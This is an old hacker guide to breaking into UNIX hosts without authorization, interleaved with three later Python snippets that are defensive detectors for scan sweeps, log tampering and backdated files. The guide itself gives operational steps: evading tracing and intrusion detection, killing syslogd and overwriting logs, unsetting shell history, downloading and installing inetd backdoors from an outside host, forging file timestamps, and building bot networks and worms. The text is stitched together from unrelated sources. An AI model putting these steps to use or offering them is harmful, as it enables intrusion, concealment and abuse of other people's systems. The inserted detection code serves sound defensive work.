(c) 1999 by Mixter
Disclaimer:
This is a theoretical introduction to cracking, written for informational
purposes. It should be seen as an introduction to the methods and
strategies used by crackers rather than a howto. The author is not
suggesting that anyone perform illegal actions and cannot be held liable
for the actions of other individuals who perform any of the actions
discussed in this paper, or for any resulting damage.
Introduction:
I am going to describe the methods and strategies used to access
various UNIX hosts on the internet without authorization. This guide will
not teach you how to hack, nor do you have to be a hacker to use
the techniques described here. Hacking means finding your own way
to do it, and finding new approaches to accomplishing something. I am
only going to supply you with one possible approach to cracking.
I. Prerequisites
Operating System:
You certainly need Unix installed on your home computer. WINDOWS
WILL NOT DO. I'm not going into details here, but you should take
either Net/Open/FreeBSD or Linux because they are POSIX compliant,
suitable for home PCs, and most small network tools will compile
on them. If you use Linux [1], you should not use the RedHat, SuSE, or
Slackware distributions unless you know how to secure them properly.
A local root compromise can be fatal, as it may reveal your identity.
Basic Knowledge:
Get experienced with the following tools. Use the 'man' command,
and work with them until you fully understand them. These tools are:
awk cat chmod dd grep gzip kill ln
ls mail mknod more mount ping ps sed
sort tar ifconfig ipfwadm last head tail
gcc cut find ftp less vim nc (netcat)
rcp xhost xterm syslogd inetd telnet ssh finger
Security requirements:
You need to make sure that no one can compromise your own host. Check
security sites to make sure your daemons (servers) are not exploitable.
Do not allow anyone to use your box. Disable telnet, rlogin, and whatever
you don't need yourself. Ideally, you do not run any servers at all while
you are attacking other hosts. Consider encrypting directories and/or
complete partitions with encrypted file systems and encrypt emails and
files you transfer with PGP. [2]
Account:
For your activities, you require an ISP account with a direct connection,
which normally all ISPs provide. You might want to consider not doing
any 'cracking' activities from your home at all, in which case you need
a fast Linux or BSD shell account, which must not be from a commercial
shell provider (esp. those who sell eggdrop and irc accounts), and if
you use a university account, you need to make sure that they do not
watch / monitor their users. If you use a dialup, make sure that
no transparent proxies or network monitors (squid etc.) are being run by
your provider. Do a traceroute and check your provider's backbone routers
for NIDS (Intrusion Detection), network monitors, proxies, and anything
that seems unusual; alternatively, let someone with more knowledge do it.
II. Scanning
Avoiding track-downs:
Where you scan from is up to you. Whatever you do, don't scan from your
dialup while using a legit internet account. Everyone who knows your IP is
a phone call to your provider away from knowing your identity. If you
use fake accounts, avoid using fake or stolen credit cards to make them.
Also avoid using 1-800 numbers at all costs, because the 1-800 nodes
generally log every calling phone number with access time. Inquire about
the ISP you use to make sure it is not in explicit cooperation with federal
agencies. Additionally, do not stay longer than 5 (in words: five) hours
on the internet without hanging up and reconnecting. Why? While you are
logged on, the node has your account associated with your current
dynamic IP address for obvious technical reasons, and they might also
be able to trace you. Most nodes will not keep a table of which IP
belonged to which account once they have disconnected, especially at huge
ISPs where this would take large additional resources.
I advise against traversing through WinGate and SOCKS servers,
because they give you a false feeling of safety. Often, these servers are
logging every access, and sometimes they are put up by federal agencies
themselves. You should ideally relay your connections through a server
on which you have root, hence full control, using datapipe, bnc, ssl, or a
wingate/socks server with logging completely disabled.
Stealthy scanning:
A scan that is not noticed is a successful scan. Half-open (SYN)
scans are lame, because many daemons will still report a
"warning: can't get client address: Connection reset by peer"
or similar message; then someone turns on a sniffer or tcplogd
and they see who is scanning them. Advanced and recommended scans
are NUL (tcp packet without any flags), XMAS (ack/syn/rst probe),
and Maimon scans, which can be done with nmap [3]. If you use
connect() scans, which are much more reliable, then use lscan,
and get the version info. This generally makes the most sense
because you have to get the daemons' versions anyway to see
if they are exploitable.
Play dead:
As you scan, I strongly recommend disabling every single service
on the machine you're scanning from and setting packet filtering
rules. This will fool the hosts being scanned into thinking your
host is down and the scan is spoofed.
A few things you should disable:
* Inetd ( identd, finger, ftp, telnet )
* All INCOMING tcp connection requests (ipfwadm: -y flag)
* ICMP Timestamping, Echo reply, Query (ICMP types 8/13/15/17)
* UDP Traceroute queries (udp port range 33400-33500)
Also note that -deny is better than -reject, which would send
an ICMP unreach packet back instead of keeping totally silent.
Non-sequential scanning:
This is important: Use non-sequential scanning to avoid
intrusion detection systems. An IDS or NIDS is installed on a gateway
or router and monitors unusual traffic to certain ports. If you scan
1.1.1.1, 1.1.1.2 .. 1.1.1.255, 1.1.2.1 etc.,
an intrusion detection system can detect your scan against 1.1.1.*.
Instead, scan like this: 1.1.1.1, 1.1.2.1 .. 1.1.255.1, 1.1.1.2
You get the point.
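The scan order above is exactly what a detector has to cope with, so here is the other side of it, as an added example that is not from the paper: a counter keyed on the destination /24 sees one probe per subnet when the sweep walks 1.1.1.1, 1.1.2.1, 1.1.3.1 and so on, while a counter keyed on the source address over a sliding time window still sees the whole sweep. The log format, gateway name and addresses below are constructed for the demonstration and are not real ipfwadm or IDS output.

```python
"""Detect a host sweep spread across many subnets by keying on the source.

Added example, not part of Mixter's paper.  Log format, host name and
addresses are constructed.
"""
from collections import defaultdict
from datetime import datetime
import ipaddress
import re

# Constructed lines in a generic "firewall deny" style (not real ipfwadm output).
# 203.0.113.9 probes port 110 on one host in each of six /24s; 198.51.100.4 is
# ordinary retried mail traffic to a single host.
SAMPLE_LOG = """\
1999-06-14T02:11:05 gw DENY src=203.0.113.9 dst=10.1.1.1 dport=110
1999-06-14T02:11:06 gw DENY src=203.0.113.9 dst=10.1.2.1 dport=110
1999-06-14T02:11:07 gw DENY src=203.0.113.9 dst=10.1.3.1 dport=110
1999-06-14T02:11:08 gw DENY src=203.0.113.9 dst=10.1.4.1 dport=110
1999-06-14T02:11:09 gw DENY src=203.0.113.9 dst=10.1.5.1 dport=110
1999-06-14T02:11:10 gw DENY src=203.0.113.9 dst=10.1.6.1 dport=110
1999-06-14T02:15:00 gw DENY src=198.51.100.4 dst=10.1.1.25 dport=25
1999-06-14T02:16:00 gw DENY src=198.51.100.4 dst=10.1.1.25 dport=25
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ DENY src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)


def parse_log(text):
    """Yield (timestamp, src, dst, dport) tuples; skip lines that do not match."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield (datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"]))


def probes_per_subnet(events, prefixlen=24, src=None):
    """Per-destination-subnet view: what a detector watching one /24 sees.
    Optionally restrict to a single source address."""
    counts = defaultdict(int)
    for _ts, s, dst, _port in events:
        if src is not None and s != src:
            continue
        net = ipaddress.ip_network(f"{dst}/{prefixlen}", strict=False)
        counts[str(net)] += 1
    return dict(counts)


def distinct_targets_per_source(events, window_seconds=300):
    """Largest number of distinct destination hosts each source touched
    within any window of window_seconds (sliding over its own probes)."""
    by_src = defaultdict(list)
    for ts, src, dst, _port in events:
        by_src[src].append((ts, dst))
    peak = {}
    for src, probes in by_src.items():
        probes.sort()
        best = 0
        for i, (start, _dst) in enumerate(probes):
            seen = set()
            for ts, dst in probes[i:]:
                if (ts - start).total_seconds() > window_seconds:
                    break
                seen.add(dst)
            best = max(best, len(seen))
        peak[src] = best
    return peak


def sweeping_sources(text, threshold=5, window_seconds=300):
    """Sources that probed at least `threshold` distinct hosts inside one window."""
    events = list(parse_log(text))
    peak = distinct_targets_per_source(events, window_seconds)
    return sorted(src for src, n in peak.items() if n >= threshold)


if __name__ == "__main__":
    evs = list(parse_log(SAMPLE_LOG))
    print("per /24, sweep source only:", probes_per_subnet(evs, src="203.0.113.9"))
    print("sweeping sources:", sweeping_sources(SAMPLE_LOG))
```

The per-subnet view never exceeds one probe per /24 for the sweeping source, which is the blind spot the text relies on; the per-source window count reports six distinct targets in a few seconds and flags it, while the repeated mail connection to a single host stays below threshold.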
What to scan:
Most crackers resolve a top-level domain like .com .net or a
country like .ee .se .ch etc. using z0ne or axfr from ADM [4], or
by using a simple recursive shell script. host -l domain will
not do for a scan, because you'll miss all the subnets that way,
and there are plenty of them.
However, I'd rather suggest scanning complete IP blocks. Depending
on your greed, you can either scan a class B (1.1.*.*) or class A
(1.*.*.*) network. You might wish to obtain some information about
your targets first. To do this, you can query whois.arin.net, the
registration center for IP addresses. Let's say you want to scan
192.168.*.* and you want to know who owns that IP block. Type:
whois -h whois.arin.net 192.168.0.0
or
whois 192.168.0.0@whois.arin.net
and you get a short description of the owners of that netblock.
If arin.net doesn't find any information, don't scan it, because
the IPs are probably not yet in use. Some info on the 'whois'
results...
Maintained by RIPE.NET  = European (no, uk, ch, at, de, se, dk, etc.)
Maintained by APNIC.NET = Asian (id, kr, za, ee, tr, li, kh, etc.)
Maintained by NIC.xxx   = Belonging to country xxx
Finding vulnerable hosts:
First rule of scanning is: never delete your scan logs. If
you think you are completely done with evaluating your logs,
then compress, encrypt and store them, don't delete them. New
security vulnerabilities will be found sooner or later, and then you
won't have to scan it all again.
From my experience, the vulnerability scanners are almost all
bullshit, you don't need them. Use grep and awk to extract the
IP numbers from your scan logs, like this...
grep "QPOP" port110.log | grep "(version 2.2)" | awk '{print $1}' > 0wn.txt
(presuming that your scanner logs like this: "
There are a couple of cases where you need an additional scan
to find vulnerable versions, which are:
Buggy Daemon     Scanner                          Scans for...
wu-ftp BETA-18   wuftpscan/ben (private)          Writable dir
portmap          rpcinfo -p (unix tool)           Portmap version
ttdbserver       rpcinfo                          ttdb version
rstatd           statdscan                        rstatd version
mountd           mountdscan (rootshell)           mountd/nfs version
bind             binfo-udp (rootshell),           bind version
                 nscan (my site),
                 mbind (private)
III. Rooting
Let's think about the first commands you issue. They should:
1. Discreetly remove traces of the root compromise
2. Gather some general info about the system
3. Make sure you can get back in
4. Disable or patch the vulnerable daemon(s)
Here are my suggestions...
1. killall -9 syslogd klogd - pesky loggers! Only a few admins
will notice if they get turned off. Now you can act freely.
Copy secure.1 and messages.1 from /var/log over secure and messages.
Normally, these logs are the only ones with the intruder's IP
and traces of a root compromise in them. If *.1 doesn't exist,
truncate the files. Also, unset HISTFILE is important.
Nobody does unset HISTFILE, thus leaving a .bash_history in
/var/named or even /. Very unprofessional :).
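Seen from the admin's side, both halves of suggestion 1 leave a signature. This added example (not part of the paper) checks a syslog excerpt for the stretch of silence a killed syslogd produces, using the "-- MARK --" heartbeat line that syslogd writes every 20 minutes by default, and flags a live log that is byte-identical to its rotated predecessor, which is what copying messages.1 over messages leaves behind. The log lines and host name are constructed.

```python
"""Two checks for the log-tampering steps described above.

Added example, not part of the original paper.  Log lines and host name are
constructed.  syslogd writes a "-- MARK --" line every 20 minutes by default,
so a gap much longer than that in a log that otherwise receives MARKs means
the logger was not writing (killed, or its output redirected).
"""
from datetime import datetime
import hashlib

MARK_INTERVAL_SECONDS = 20 * 60

# Constructed excerpt of /var/log/messages: MARKs every 20 minutes, then a
# six-hour hole between 02:20 and 08:20.
CURRENT_LOG = """\
Jun 14 01:40:00 victim -- MARK --
Jun 14 02:00:00 victim -- MARK --
Jun 14 02:11:13 victim sshd[4012]: Accepted password for alice from 198.51.100.4
Jun 14 02:20:00 victim -- MARK --
Jun 14 08:20:00 victim -- MARK --
Jun 14 08:40:00 victim -- MARK --
"""

# Constructed rotated copy (messages.1) from the previous day.
ROTATED_LOG = """\
Jun 13 23:40:00 victim -- MARK --
Jun 14 00:00:00 victim -- MARK --
"""


def parse_timestamp(line, year=1999):
    """Parse the 'Mon DD HH:MM:SS' prefix syslog uses; the year is not logged,
    so the caller supplies it.  Raises ValueError for non-syslog lines."""
    month, day, clock = line.split(None, 3)[:3]
    ts = datetime.strptime(f"{month} {day} {clock}", "%b %d %H:%M:%S")
    return ts.replace(year=year)


def silent_periods(text, limit_seconds=2 * MARK_INTERVAL_SECONDS, year=1999):
    """Return (gap_seconds, last_stamp_before, first_stamp_after) for every
    gap between consecutive entries that exceeds limit_seconds."""
    stamps = []
    for line in text.splitlines():
        try:
            stamps.append((parse_timestamp(line, year), line))
        except ValueError:
            continue  # continuation or garbage line; ignore
    gaps = []
    for (prev_ts, prev_line), (ts, line) in zip(stamps, stamps[1:]):
        gap = int((ts - prev_ts).total_seconds())
        if gap > limit_seconds:
            gaps.append((gap, prev_line[:15], line[:15]))
    return gaps


def looks_overwritten(current_text, rotated_text):
    """True when the live log is byte-identical to its rotated predecessor.
    A real 'messages' keeps growing after rotation, so identical contents
    (with a non-empty .1) point at a copy-back rather than a quiet host.
    Hashing mirrors comparing the two files on disk with cksum/md5sum."""
    if not rotated_text:
        return False
    current = hashlib.sha256(current_text.encode()).hexdigest()
    rotated = hashlib.sha256(rotated_text.encode()).hexdigest()
    return current == rotated


if __name__ == "__main__":
    print("silent periods:", silent_periods(CURRENT_LOG))
    print("copied back over?", looks_overwritten(CURRENT_LOG, CURRENT_LOG))
```

Neither check helps once the log lines only exist on a remote loghost the intruder cannot reach, which is why the paper itself treats a loghost as the dangerous case; on a host that logs locally, the MARK gap and the identical-files test are cheap to run from cron.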
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf...
Inform yourself about how frequently the system is being
maintained and administrated, and whether the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the
more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! You might want to
remove other backdoors.
* Look for a loghost or snmp (dangerous because you can't manipulate
the logs on a far-away loghost). Watch out for *logd, sniffers,
netmons etc. before you do anything great on the host.
If you are paranoid, traceroute the host, and see if non-routers
are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DON'T MANIPULATE THE SYSTEM CONFIGURATION! DOH!
It is too easy to detect you if you add yourself to /etc/passwd,
or open a port by manipulating inetd.conf. Let me tell you that
root kits and /bin/login trojans are the first things any sane admin
will watch for. Install a nice stealthy port backdoor. My approach
to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
(on the target box)
uudecode
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on
port 666, that spits out the source code when someone telnets to
it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c
As I said, make sure you can get back in. If the box you rooted
has an uptime of more than 300 days or so, you might consider
not installing the backdoor for startup. Instead, kill the
vulnerable daemon, and when the host restarts, come back using an
exploit. Normally, you can replace a lame daemon that nobody uses
with your backdoor. Look at inetd.conf to see what daemons are
active. A safe bet is in.talkd which often is activated but seldom
ever used. So, when you want to re-activate your backdoor,
talk root@0wned.host.com for a second, and your backdoor is running.
You can also add /path/to/backdoor to /root/.profile... but it is
a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, the CIAC security list, or look at rootshell,
to see what you need to do to patch your buggy stuff. If RPM is
installed you can try an rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm
If not, use ncftp to fetch the file anonymously, because it doesn't need
user interaction. If you want, add an additional backdoor in your
"patched" server. QPOP 2.53 even supports this itself.
For all files you replace, you should modify the time stamps.
This won't help if the admin uses tripwire or cksum, but it will if the
admin is, like most admins, a complete lamer who does find / -ctime
to scan for trojans and thinks he knows his job. :P
To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
This will copy the exact date/time info from /bin/bash
over your freshly added trojan. Voila!
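What touch -r actually leaves behind, as an added example that is not from the paper: utime() lets a process set atime and mtime to any value, but the kernel always sets ctime to the current time when it does so, so a planted file aged with touch -r ends up with an mtime much older than its ctime. The script below walks a tree and reports such files; demo_forged_tree() builds a throwaway directory whose file names are constructed, and pushes one file's mtime back a year the same way touch -r against an old binary would.

```python
"""Find files whose modification time was backdated with touch -r.

Added example, not part of the original paper.  touch/utime() can set atime
and mtime freely; ctime is set by the kernel to "now" whenever that happens,
so mtime far older than ctime is the fingerprint of a backdated file.
File names built by demo_forged_tree() are constructed.
"""
import os
import shutil
import stat
import tempfile
import time

ONE_YEAR = 365 * 24 * 3600


def backdated_files(root, slack_seconds=60):
    """Return relative paths (sorted) of regular files under root whose
    mtime predates ctime by more than slack_seconds.  Symlinks are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path, follow_symlinks=False)
            except OSError:
                continue  # vanished or unreadable; not our concern here
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_ctime - st.st_mtime > slack_seconds:
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo_forged_tree():
    """Build a temp tree with one freshly written file ("fresh") and one whose
    mtime was pushed back a year ("planted"), exactly what
    `touch -r <year-old binary> planted` does, then run the detector on it."""
    root = tempfile.mkdtemp(prefix="ctimecheck-")
    try:
        for name in ("fresh", "planted"):
            with open(os.path.join(root, name), "w") as fh:
                fh.write("#!/bin/sh\n")  # constructed content, irrelevant to the check
        old = time.time() - ONE_YEAR
        # Sets atime and mtime only; the kernel bumps ctime to the current time.
        os.utime(os.path.join(root, "planted"), (old, old))
        return backdated_files(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("backdated:", demo_forged_tree())
```

The same property is why a plain find / -ctime -1 still lists a file that was just touched -r: ctime cannot be set from user space without changing the system clock or writing to the raw device, which is what tripwire-style baselines of mtime, ctime and content together rely on.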
The alternative to all this, for lazy people, is to add an
ipfwadm rule that prevents traffic from the outside (-W eth0)
to the ports with the buggy daemons, and to add that command
to an rc.d script as well. Bind doesn't need tcp port 53 for anything
except zone transfers and the RoTShB/ADM bind exploits. It works
fine with 53/tcp firewalled. But be aware that this might get you
detected, let's say if you disable port 110 or 143 on an ISP's
central mail exchange server...
About your backdoor:
Port > 10000 is strongly recommended; a backdoor using UDP,
ICMP, or even something as unusual as raw IP is also very useful.
People that bind /bin/sh to a port are idiots, because they
open that host to everyone, letting in sniffers, and probably
other people who may damage the host seriously. Make sure to
password protect everything that runs as root. Use a password
with a minimum length of 8 characters, because you have no way
of detecting a brute force attack. For the C programmers, let
me say, listen(sockfd,1). Maybe 2 connections, but not more.
For convenience, you can add some stuff you want to occur
on each successful backdoor login, like system("w"),
system("killall -9 syslogd klogd"), or whatever. If you want a
front-end backdoor with some integrated functions, try gateway [5].
IV. UTILIZING COMPROMISED SYSTEMS
About your activities:
Do what you desire, but never disregard stealthiness.
If you stop checking log files and processes, or start something
like ping -s 1024 -f cert.org un-stealthed, it is, depending
on the admin, a matter of hours or days until you lose the host.
Most of the time, losing a host means you cannot get access again,
and the admins will examine their system with extreme scrutiny;
if they are too lame, they might contact some external security
experts or even the Computer Emergency Response Team.
Never do serious damage to the system when you don't have to -
and trust me, you won't have to. Damaging a system by altering vital
system files, replacing frequently-used programs or even destroying
information is unintelligent, will not do you any good, and will
maybe get you some new enemies.
And it goes without saying: do not deface web sites...
World domination:
As the number of systems you control increases, you might want
some kind of easy remote control, utilization for attacks,
and a way of detecting detection of your activities. You can install
newnick bots or eggdrop bots with fancy scripts which can be
controlled through IRC to make life easier (make sure to sit and
think before you consider doing anything big with them on IRC!).
You can make your own inter-linked network of root systems,
in which case you need to start programming because no one will
release such a program to the public. :)
You can make little packages with spoofing flooders, smurf
and the like, if you decide to become a packet warrior (then again,
it won't help you accomplish anything but getting irc channels
or shutting down government sites...).
Alternatively, you can use every root you get to scan new netblocks,
and have the information mailed to you or whatever. You can make
an internet worm like ADMw0rm [4], B4b0w0rm, millennium worm
(the last 2 are private), and install them on your roots; make sure
it is well constructed and bug-free...
If you are a creative person, you can make them scan large amounts
of ISP dialup netblocks for back orifice, netbus server, backdoor G,
and what not, and write something that controls their computers
to spread more trojans, send their mail to you, get their
passwords, flood, scan, invade their private lives...
no wait, that's the government's job.
V. YOUR PRESENCE ON THE NET
Smart behavior and senseless behavior:
What you do besides cracking mostly happens on IRC. IRC
should be seen as a tool for getting in touch with other
skilled persons and exchanging thoughts and information.
To avoid wasting your time and skills, and possibly getting
busted, here are some things which you SERIOUSLY should
not be doing:
1) Warez. Stay away from warez, it is a waste of time.
Warez ruins productive people and makes software expensive.
Besides the moral bullshit, you can always get something
you really need (#1 net game, enterprise application etc.),
and you don't need much, trust me. Almost everything
security / hacking related is free. Joining a warez group
gets you a) a lot of vhosts with lame names b) idiotic
friends c) on the FBI blacklist - nothing besides that.
2) 'IRC War'. Groups like core, chrome, enforce, conflict,
takeover, madcrew, phorce, tnt, etc. etc. who call themselves
'War' groups, are good for nothing. Why would you want to
be a member of a group that attacks other similar groups
and channels - it is comparable to the mafia - almost
as violent and dangerous, except that you don't get rich.
If you think you need 'WarGroup' support for taking a
channel with reasonable security, you are lame or you
can't take a challenge. Think again.
3) Hacking related groups. Inform yourself about what
happened to gH or 'global Hell'. Most of these groups
do the exact opposite of what is advised in this paper.
If you get an offer to join
l0pht, cDc, MOD, thc, or ADM, take it because you'll
learn a lot; all other groups are not worth your time.
4) IRC operators, BOFH, admins of big systems. Stay away
from them until you are confidently prepared and willing
to fight with them. Blindly attacking them can be a waste
of time, but it can also become a reasonable challenge.
Keep up to date:
The more you advance in cracking skills, or even
consider hacking, programming or developing, the more the web
will probably become the part of the net you use least.
Visit your favorite security related sites frequently,
and make sure to keep up to date about security breaches,
law enforcement, exploits, changes in the methods of
crackers and admins. My bookmarks certainly include
Packetstorm security [6] and GeekGirl [7].
URLS:
[1] ftp://ftp.cdrom.com/pub/linux/distributions
[2] http://members.xoom.com/i0wnu/pgp.html
[3] http://www.nmap.org
[4] ftp://ftp.adm.isp.at/pub/ADM
[5] http://members.xoom.com/i0wnu/gateway.tgz
[6] http://www.genocide2600.com/~tattooman
[7] http://www.geek-girl.com
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH
A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU
E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV
JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T
7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz
JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA==
=o8mY